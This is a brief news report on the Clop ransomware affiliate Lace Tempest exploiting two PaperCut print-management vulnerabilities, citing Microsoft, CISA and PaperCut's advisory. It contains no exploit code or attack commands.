Hackers Utilize PaperCut Printer Vulnerability To Spread Clop Ransomware
The threat actors linked to the Clop ransomware operation are exploiting two recently-disclosed susceptibilities in PaperCut, a print management software, to steal corporate data from targets.
Microsoft attributed the attacks to a hacking group they previously track as Lace Tempest — a group whose activities overlap with FIN11 and TA505.
They are a financially-motivated hacking group that operates as a Clop affiliate, in essence, they carry out attacks and deploy Clop ransomware, earning a commission for successful missions.
Lace Tempest & Clop Ransomware
April 13 was Lace Tempest’s first appearance and since then been exploiting two PaperCut susceptibility — CVE-2023-27350 and CVE-2023-27351 — to deliver Clop ransomware, according to Microsoft.
Last week, the Cybersecurity and Infrastructure Security Agency (CISA) warned that threat actors had exploited the vulnerabilities to gain entry to unpatched servers on customer networks.
Furthermore, PaperCut posted its first advisory about the issue on March 8, releasing a fix for the bug. The firm said it was notified of the vulnerabilities by Trend Micro researchers on January 10.
Subsequently, the bugs authorized hackers to remotely access victim systems, and extract data about users’s customer’s servers, including usernames, full names, email addresses, and payment card numbers associated with the accounts.
PaperCut builds printing management software for Canon, Epson, Xerox, and almost every other major printer brand. More than 70,000 organizations, government agencies, universities, and large companies around the world utilize it tools.
Microsoft reported that Lace Tempest utilized several PowerShell commands to deliver a TrueBot malware downloader to any marked systems for exploitation.
In previous attacks, Lace Tempest has been monitored using Fortra’s GoAnywhere file transfer effect exploits and the Raspberry Robin worm to deliver ransomware — two techniques commonly associated with the Clop ransomware group.
We’re observing other attacks also exploiting this susceptibility, including breaches leading to Lockbit deployment, Microsoft said, referring to another major ransomware operation.